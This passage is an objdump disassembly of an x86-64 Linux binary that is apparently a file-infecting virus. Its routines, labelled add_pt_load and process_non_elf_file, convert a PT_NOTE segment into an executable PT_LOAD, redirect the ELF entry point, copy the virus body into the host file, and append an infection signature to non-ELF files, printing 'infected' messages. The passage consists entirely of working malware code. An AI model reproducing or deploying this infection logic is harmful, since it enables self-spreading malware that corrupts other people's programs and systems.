  401c6d:	eb 91                	jmp    401c00 <add_pt_load.apt_sig_check_loop>

0000000000401c6f <add_pt_load.apt_sig_check_done>:
  401c6f:	b8 08 00 00 00       	mov    $0x8,%eax
  401c74:	44 89 ef             	mov    %r13d,%edi
  401c77:	31 f6                	xor    %esi,%esi
  401c79:	31 d2                	xor    %edx,%edx
  401c7b:	0f 05                	syscall
  401c7d:	b8 00 00 00 00       	mov    $0x0,%eax
  401c82:	44 89 ef             	mov    %r13d,%edi
  401c85:	48 8d 35 04 24 10 00 	lea    0x102404(%rip),%rsi        # 504090 <elf_header_buf>
  401c8c:	ba 40 00 00 00       	mov    $0x40,%edx
  401c91:	0f 05                	syscall
  401c93:	48 8d 3d f6 23 10 00 	lea    0x1023f6(%rip),%rdi        # 504090 <elf_header_buf>
  401c9a:	48 8b 47 18          	mov    0x18(%rdi),%rax
  401c9e:	48 89 45 e8          	mov    %rax,-0x18(%rbp)
  401ca2:	4c 8b 77 20          	mov    0x20(%rdi),%r14
  401ca6:	0f b7 5f 38          	movzwl 0x38(%rdi),%ebx
  401caa:	0f b7 47 36          	movzwl 0x36(%rdi),%eax
  401cae:	48 89 45 d8          	mov    %rax,-0x28(%rbp)
  401cb2:	b8 08 00 00 00       	mov    $0x8,%eax
  401cb7:	44 89 ef             	mov    %r13d,%edi
  401cba:	4c 89 f6             	mov    %r14,%rsi
  401cbd:	31 d2                	xor    %edx,%edx
  401cbf:	0f 05                	syscall
  401cc1:	48 89 d8             	mov    %rbx,%rax
  401cc4:	48 0f af 45 d8       	imul   -0x28(%rbp),%rax
  401cc9:	48 89 c2             	mov    %rax,%rdx
  401ccc:	b8 00 00 00 00       	mov    $0x0,%eax
  401cd1:	44 89 ef             	mov    %r13d,%edi
  401cd4:	48 8d 35 f5 23 10 00 	lea    0x1023f5(%rip),%rsi        # 5040d0 <elf_phdr_buf>
  401cdb:	0f 05                	syscall
  401cdd:	48 8d 3d ec 23 10 00 	lea    0x1023ec(%rip),%rdi        # 5040d0 <elf_phdr_buf>
  401ce4:	48 31 c9             	xor    %rcx,%rcx

0000000000401ce7 <add_pt_load.find_note_loop>:
  401ce7:	48 39 d9             	cmp    %rbx,%rcx
  401cea:	0f 8d a2 01 00 00    	jge    401e92 <add_pt_load.add_pt_load_close_fail>
  401cf0:	48 89 c8             	mov    %rcx,%rax
  401cf3:	48 0f af 45 d8       	imul   -0x28(%rbp),%rax
  401cf8:	48 8d 34 07          	lea    (%rdi,%rax,1),%rsi
  401cfc:	83 3e 04             	cmpl   $0x4,(%rsi)
  401cff:	74 05                	je     401d06 <add_pt_load.found_note_main>
  401d01:	48 ff c1             	inc    %rcx
  401d04:	eb e1                	jmp    401ce7 <add_pt_load.find_note_loop>

0000000000401d06 <add_pt_load.found_note_main>:
  401d06:	56                   	push   %rsi
  401d07:	48 8d 3d c2 23 10 00 	lea    0x1023c2(%rip),%rdi        # 5040d0 <elf_phdr_buf>
  401d0e:	48 31 c9             	xor    %rcx,%rcx
  401d11:	4d 31 c0             	xor    %r8,%r8

0000000000401d14 <add_pt_load.find_max_vaddr_main>:
  401d14:	48 39 d9             	cmp    %rbx,%rcx
  401d17:	7d 26                	jge    401d3f <add_pt_load.found_max_vaddr_main>
  401d19:	48 89 c8             	mov    %rcx,%rax
  401d1c:	48 0f af 45 d8       	imul   -0x28(%rbp),%rax
  401d21:	48 8d 34 07          	lea    (%rdi,%rax,1),%rsi
  401d25:	83 3e 01             	cmpl   $0x1,(%rsi)
  401d28:	75 10                	jne    401d3a <add_pt_load.next_phdr_main>
  401d2a:	4c 8b 4e 10          	mov    0x10(%rsi),%r9
  401d2e:	4c 03 4e 28          	add    0x28(%rsi),%r9
  401d32:	4d 39 c1             	cmp    %r8,%r9
  401d35:	7e 03                	jle    401d3a <add_pt_load.next_phdr_main>
  401d37:	4d 89 c8             	mov    %r9,%r8

0000000000401d3a <add_pt_load.next_phdr_main>:
  401d3a:	48 ff c1             	inc    %rcx
  401d3d:	eb d5                	jmp    401d14 <add_pt_load.find_max_vaddr_main>

0000000000401d3f <add_pt_load.found_max_vaddr_main>:
  401d3f:	48 8b 45 f8          	mov    -0x8(%rbp),%rax
  401d43:	48 25 ff 0f 00 00    	and    $0xfff,%rax
  401d49:	49 81 c0 ff 0f 00 00 	add    $0xfff,%r8
  401d50:	49 81 e0 00 f0 ff ff 	and    $0xfffffffffffff000,%r8
  401d57:	49 01 c0             	add    %rax,%r8
  401d5a:	5e                   	pop    %rsi
  401d5b:	c7 06 01 00 00 00    	movl   $0x1,(%rsi)
  401d61:	c7 46 04 07 00 00 00 	movl   $0x7,0x4(%rsi)
  401d68:	48 8b 45 f8          	mov    -0x8(%rbp),%rax
  401d6c:	48 89 46 08          	mov    %rax,0x8(%rsi)
  401d70:	4c 89 46 10          	mov    %r8,0x10(%rsi)
  401d74:	4c 89 46 18          	mov    %r8,0x18(%rsi)
  401d78:	4c 89 45 e0          	mov    %r8,-0x20(%rbp)
  401d7c:	b8 94 07 00 00       	mov    $0x794,%eax
  401d81:	48 89 46 20          	mov    %rax,0x20(%rsi)
  401d85:	48 89 46 28          	mov    %rax,0x28(%rsi)
  401d89:	48 c7 46 30 00 10 00 	movq   $0x1000,0x30(%rsi)
  401d90:	00 
  401d91:	b8 08 00 00 00       	mov    $0x8,%eax
  401d96:	44 89 ef             	mov    %r13d,%edi
  401d99:	4c 89 f6             	mov    %r14,%rsi
  401d9c:	31 d2                	xor    %edx,%edx
  401d9e:	0f 05                	syscall
  401da0:	48 89 d8             	mov    %rbx,%rax
  401da3:	48 0f af 45 d8       	imul   -0x28(%rbp),%rax
  401da8:	48 89 c2             	mov    %rax,%rdx
  401dab:	b8 01 00 00 00       	mov    $0x1,%eax
  401db0:	44 89 ef             	mov    %r13d,%edi
  401db3:	48 8d 35 16 23 10 00 	lea    0x102316(%rip),%rsi        # 5040d0 <elf_phdr_buf>
  401dba:	0f 05                	syscall
  401dbc:	48 8b 45 e0          	mov    -0x20(%rbp),%rax
  401dc0:	48 83 c0 19          	add    $0x19,%rax
  401dc4:	48 8d 3d c5 22 10 00 	lea    0x1022c5(%rip),%rdi        # 504090 <elf_header_buf>
  401dcb:	48 89 47 18          	mov    %rax,0x18(%rdi)
  401dcf:	b8 08 00 00 00       	mov    $0x8,%eax
  401dd4:	44 89 ef             	mov    %r13d,%edi
  401dd7:	31 f6                	xor    %esi,%esi
  401dd9:	31 d2                	xor    %edx,%edx
  401ddb:	0f 05                	syscall
  401ddd:	b8 01 00 00 00       	mov    $0x1,%eax
  401de2:	44 89 ef             	mov    %r13d,%edi
  401de5:	48 8d 35 a4 22 10 00 	lea    0x1022a4(%rip),%rsi        # 504090 <elf_header_buf>
  401dec:	ba 40 00 00 00       	mov    $0x40,%edx
  401df1:	0f 05                	syscall
  401df3:	48 8d 35 cc f5 ff ff 	lea    -0xa34(%rip),%rsi        # 4013c6 <original_entry_storage>
  401dfa:	48 8d 3d cf 40 10 00 	lea    0x1040cf(%rip),%rdi        # 505ed0 <virus_copy_buf>
  401e01:	b9 94 07 00 00       	mov    $0x794,%ecx

0000000000401e06 <add_pt_load.copy_virus_main>:
  401e06:	48 85 c9             	test   %rcx,%rcx
  401e09:	74 0f                	je     401e1a <add_pt_load.copy_done_main>
  401e0b:	8a 06                	mov    (%rsi),%al
  401e0d:	88 07                	mov    %al,(%rdi)
  401e0f:	48 ff c6             	inc    %rsi
  401e12:	48 ff c7             	inc    %rdi
  401e15:	48 ff c9             	dec    %rcx
  401e18:	eb ec                	jmp    401e06 <add_pt_load.copy_virus_main>

0000000000401e1a <add_pt_load.copy_done_main>:
  401e1a:	48 8d 3d af 40 10 00 	lea    0x1040af(%rip),%rdi        # 505ed0 <virus_copy_buf>
  401e21:	48 8b 45 e8          	mov    -0x18(%rbp),%rax
  401e25:	48 8b 4d e0          	mov    -0x20(%rbp),%rcx
  401e29:	48 83 c1 19          	add    $0x19,%rcx
  401e2d:	48 29 c8             	sub    %rcx,%rax
  401e30:	48 89 07             	mov    %rax,(%rdi)
  401e33:	b8 08 00 00 00       	mov    $0x8,%eax
  401e38:	44 89 ef             	mov    %r13d,%edi
  401e3b:	31 f6                	xor    %esi,%esi
  401e3d:	ba 02 00 00 00       	mov    $0x2,%edx
  401e42:	0f 05                	syscall
  401e44:	b8 01 00 00 00       	mov    $0x1,%eax
  401e49:	44 89 ef             	mov    %r13d,%edi
  401e4c:	48 8d 35 7d 40 10 00 	lea    0x10407d(%rip),%rsi        # 505ed0 <virus_copy_buf>
  401e53:	ba 94 07 00 00       	mov    $0x794,%edx
  401e58:	0f 05                	syscall
  401e5a:	b8 03 00 00 00       	mov    $0x3,%eax
  401e5f:	44 89 ef             	mov    %r13d,%edi
  401e62:	0f 05                	syscall
  401e64:	48 8d 3d e3 11 00 00 	lea    0x11e3(%rip),%rdi        # 40304e <msg_infected>
  401e6b:	e8 25 f2 ff ff       	call   401095 <print_string>
  401e70:	4c 89 e7             	mov    %r12,%rdi
  401e73:	e8 1d f2 ff ff       	call   401095 <print_string>
  401e78:	b8 01 00 00 00       	mov    $0x1,%eax
  401e7d:	bf 01 00 00 00       	mov    $0x1,%edi
  401e82:	48 8d 35 77 11 00 00 	lea    0x1177(%rip),%rsi        # 403000 <newline>
  401e89:	ba 01 00 00 00       	mov    $0x1,%edx
  401e8e:	0f 05                	syscall
  401e90:	eb 0a                	jmp    401e9c <add_pt_load.add_pt_load_done>

0000000000401e92 <add_pt_load.add_pt_load_close_fail>:
  401e92:	b8 03 00 00 00       	mov    $0x3,%eax
  401e97:	44 89 ef             	mov    %r13d,%edi
  401e9a:	0f 05                	syscall

0000000000401e9c <add_pt_load.add_pt_load_done>:
  401e9c:	5b                   	pop    %rbx
  401e9d:	41 5f                	pop    %r15
  401e9f:	41 5e                	pop    %r14
  401ea1:	41 5d                	pop    %r13
  401ea3:	41 5c                	pop    %r12
  401ea5:	48 83 c4 50          	add    $0x50,%rsp
  401ea9:	48 89 ec             	mov    %rbp,%rsp
  401eac:	5d                   	pop    %rbp
  401ead:	c3                   	ret

0000000000401eae <process_non_elf_file>:
  401eae:	55                   	push   %rbp
  401eaf:	48 89 e5             	mov    %rsp,%rbp
  401eb2:	41 54                	push   %r12
  401eb4:	41 55                	push   %r13
  401eb6:	41 56                	push   %r14
  401eb8:	41 57                	push   %r15
  401eba:	53                   	push   %rbx
  401ebb:	49 89 fc             	mov    %rdi,%r12
  401ebe:	b8 01 01 00 00       	mov    $0x101,%eax
  401ec3:	bf 9c ff ff ff       	mov    $0xffffff9c,%edi
  401ec8:	4c 89 e6             	mov    %r12,%rsi
  401ecb:	31 d2                	xor    %edx,%edx
  401ecd:	45 31 d2             	xor    %r10d,%r10d
  401ed0:	0f 05                	syscall
  401ed2:	48 85 c0             	test   %rax,%rax
  401ed5:	0f 88 3e 01 00 00    	js     402019 <process_non_elf_file.process_done>
  401edb:	49 89 c5             	mov    %rax,%r13
  401ede:	b8 08 00 00 00       	mov    $0x8,%eax
  401ee3:	44 89 ef             	mov    %r13d,%edi
  401ee6:	31 f6                	xor    %esi,%esi
  401ee8:	ba 02 00 00 00       	mov    $0x2,%edx
  401eed:	0f 05                	syscall
  401eef:	48 85 c0             	test   %rax,%rax
  401ef2:	0f 8e 9b 00 00 00    	jle    401f93 <process_non_elf_file.process_close_and_append>
  401ef8:	49 89 c6             	mov    %rax,%r14
  401efb:	b8 08 00 00 00       	mov    $0x8,%eax
  401f00:	44 89 ef             	mov    %r13d,%edi
  401f03:	31 f6                	xor    %esi,%esi
  401f05:	31 d2                	xor    %edx,%edx
  401f07:	0f 05                	syscall
  401f09:	4d 31 ff             	xor    %r15,%r15

0000000000401f0c <process_non_elf_file.process_sig_read_loop>:
  401f0c:	b8 00 00 00 00       	mov    $0x0,%eax
  401f11:	44 89 ef             	mov    %r13d,%edi
  401f14:	48 8d 35 b5 2f 10 00 	lea    0x102fb5(%rip),%rsi        # 504ed0 <sig_check_buf>
  401f1b:	ba 00 10 00 00       	mov    $0x1000,%edx
  401f20:	0f 05                	syscall
  401f22:	48 85 c0             	test   %rax,%rax
  401f25:	7e 6c                	jle    401f93 <process_non_elf_file.process_close_and_append>
  401f27:	48 89 c3             	mov    %rax,%rbx
  401f2a:	48 8d 3d 9f 2f 10 00 	lea    0x102f9f(%rip),%rdi        # 504ed0 <sig_check_buf>
  401f31:	48 89 de             	mov    %rbx,%rsi
  401f34:	48 8d 15 f4 f0 ff ff 	lea    -0xf0c(%rip),%rdx        # 40102f <signature>
  401f3b:	b9 32 00 00 00       	mov    $0x32,%ecx
  401f40:	e8 8a f1 ff ff       	call   4010cf <search_substring>
  401f45:	48 85 c0             	test   %rax,%rax
  401f48:	75 2e                	jne    401f78 <process_non_elf_file.process_already_infected>
  401f4a:	49 01 df             	add    %rbx,%r15
  401f4d:	4d 39 f7             	cmp    %r14,%r15
  401f50:	7d 41                	jge    401f93 <process_non_elf_file.process_close_and_append>
  401f52:	4c 89 fe             	mov    %r15,%rsi
  401f55:	48 83 ee 32          	sub    $0x32,%rsi
  401f59:	48 83 c6 01          	add    $0x1,%rsi
  401f5d:	48 85 f6             	test   %rsi,%rsi
  401f60:	78 31                	js     401f93 <process_non_elf_file.process_close_and_append>
  401f62:	b8 08 00 00 00       	mov    $0x8,%eax
  401f67:	44 89 ef             	mov    %r13d,%edi
  401f6a:	31 d2                	xor    %edx,%edx
  401f6c:	0f 05                	syscall
  401f6e:	48 85 c0             	test   %rax,%rax
  401f71:	78 20                	js     401f93 <process_non_elf_file.process_close_and_append>
  401f73:	49 89 c7             	mov    %rax,%r15
  401f76:	eb 94                	jmp    401f0c <process_non_elf_file.process_sig_read_loop>

0000000000401f78 <process_non_elf_file.process_already_infected>:
  401f78:	b8 03 00 00 00       	mov    $0x3,%eax
  401f7d:	44 89 ef             	mov    %r13d,%edi
  401f80:	0f 05                	syscall
  401f82:	48 8d 3d cf 10 00 00 	lea    0x10cf(%rip),%rdi        # 403058 <msg_already_infected>
  401f89:	e8 07 f1 ff ff       	call   401095 <print_string>
  401f8e:	e9 86 00 00 00       	jmp    402019 <process_non_elf_file.process_done>

0000000000401f93 <process_non_elf_file.process_close_and_append>:
  401f93:	b8 03 00 00 00       	mov    $0x3,%eax
  401f98:	44 89 ef             	mov    %r13d,%edi
  401f9b:	0f 05                	syscall
  401f9d:	b8 01 01 00 00       	mov    $0x101,%eax
  401fa2:	bf 9c ff ff ff       	mov    $0xffffff9c,%edi
  401fa7:	4c 89 e6             	mov    %r12,%rsi
  401faa:	ba 01 04 00 00       	mov    $0x401,%edx
  401faf:	45 31 d2             	xor    %r10d,%r10d
  401fb2:	0f 05                	syscall
  401fb4:	48 85 c0             	test   %rax,%rax
  401fb7:	78 60                	js     402019 <process_non_elf_file.process_done>
  401fb9:	49 89 c5             	mov    %rax,%r13
  401fbc:	b8 01 00 00 00       	mov    $0x1,%eax
  401fc1:	44 89 ef             	mov    %r13d,%edi
  401fc4:	48 8d 35 64 f0 ff ff 	lea    -0xf9c(%rip),%rsi        # 40102f <signature>
  401fcb:	ba 32 00 00 00       	mov    $0x32,%edx
  401fd0:	0f 05                	syscall
  401fd2:	48 85 c0             	test   %rax,%rax
  401fd5:	78 38                	js     40200f <process_non_elf_file.process_write_failed>
  401fd7:	b8 03 00 00 00       	mov    $0x3,%eax
  401fdc:	44 89 ef             	mov    %r13d,%edi
  401fdf:	0f 05                	syscall
  401fe1:	48 8d 3d 66 10 00 00 	lea    0x1066(%rip),%rdi        # 40304e <msg_infected>
  401fe8:	e8 a8 f0 ff ff       	call   401095 <print_string>
  401fed:	4c 89 e7             	mov    %r12,%rdi
  401ff0:	e8 a0 f0 ff ff       	call   401095 <print_string>
  401ff5:	b8 01 00 00 00       	mov    $0x1,%eax
  401ffa:	bf 01 00 00 00       	mov    $0x1,%edi
  401fff:	48 8d 35 fa 0f 00 00 	lea    0xffa(%rip),%rsi        # 403000 <newline>
  402006:	ba 01 00 00 00       	mov    $0x1,%edx
  40200b:	0f 05                	syscall
  40200d:	eb 0a                	jmp    402019 <process_non_elf_file.process_done>

000000000040200f <process_non_elf_file.process_write_failed>:
  40200f:	b8 03 00 00 00       	mov    $0x3,%eax
  402014:	44 89 ef             	mov    %r13d,%edi
  402017:	0f 05                	syscall

0000000000402019 <process_non_elf_file.process_done>:
  402019:	5b                   	pop    %rbx
  40201a:	41 5f                	pop    %r15
  40201c:	41 5e                	pop    %r14
  40201e:	41 5d                	pop    %r13
  402020:	41 5c                	pop    %r12
  402022:	48 89 ec             	mov    %rbp,%rsp
  402025:	5d                   	pop    %rbp
  402026:	c3                   	ret

0000000000402027 <_end>:
  402027:	b8 3c 00 00 00       	mov    $0x3c,%eax
  40202c:	31 ff                	xor    %edi,%edi
  40202e:	0f 05                	syscall
